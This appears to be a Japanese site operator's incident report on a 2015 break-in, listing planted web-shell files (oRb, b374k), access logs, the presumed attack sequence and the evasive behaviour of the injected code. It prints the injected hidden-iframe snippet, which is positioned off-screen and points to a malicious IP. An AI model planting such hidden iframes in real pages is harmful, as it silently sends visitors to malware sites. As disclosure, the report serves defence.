-------------------------------
調査により判明した内容
* バックドアと攻撃者の行動につきまして
確認できましたバックドアファイルは以下の3つとなります。
----------
key.visualarts.gr.jp/kudo/kudo.php (Web Shell by oRb)
key.visualarts.gr.jp/kudo/ex/banner.php (Web Shell by oRb【改良版】)
key.visualarts.gr.jp/angelbeats/blog/2009/12/post_32.php (b374k Shell)
----------
ファイル名は、設置ディレクトリやhtmlファイルに似せてあり、見つけにくいようになっておりました。
(現在はすべて削除しております)
また、アクセスログを確認いたしましたところ、下記ログがございました。
----------
[02/Feb/2015:06:38:17 +0900] "GET kudo/ex/banner.php HTTP/1.1" 200 124
[02/Feb/2015:06:38:21 +0900] "POST kudo/ex/banner.php HTTP/1.1" 200 -
[02/Feb/2015:06:38:22 +0900] "GET kudo/ex/banner.php HTTP/1.1" 200 25874
[02/Feb/2015:06:39:46 +0900] "POST kudo/ex/banner.php HTTP/1.1" 200 7774
----------
このことから、攻撃者の行動の予測は以下のとおりです。
----------
1.FTP等の脆弱性を突いて「kudo.php」を設置。
2.「kudo.php」を利用しroot権限にて「banner.php」を設置。
3.「banner.php」を利用し、Apacheのバイナリを変更する。
----------
の流れとなります。
* 組み込まれましたiframe等につきまして
ソースに見えないiframeタグを埋め込んで、気づかない様に悪質なサイトへアクセスを行うものでした。
-------------------------------
<style>.h59vazf { position:absolute; left:-1026px; top:-1850px} </style>
<div class="h59vazf">
<iframe src="xxxx://184.105.163.238" width="419" height="595">
</iframe></div>
数回「xxxx://184.105.163.238(アクセスしないでください)」のアドレスにアクセスしてみたところ、 ドメイン /froppi4.eu/ (アクセスしないでください) へ転送され、カスペルスキーにて警告が表示されました。
さらに調査を行ないました結果と致しまして、以下のことが判明致しました。
・1度攻撃サイトへアクセスを行ないますと、2度目以降はiframeタグが埋め込まれませんでした。
・攻撃サイトが埋め込まれることが多いですが、Googleサイトが埋め込まれる場合もあります。
・ブラウザでアクセスを行なわないと埋め込まれない(Linuxなどからテキストベースで取得すると埋め込まれない)
尚、セキュリティソフトを入れずに上記マルウェアサイトにアクセスし、 その後カスペルスキーにてスキャンを行いましたが、何も検出されませんでした。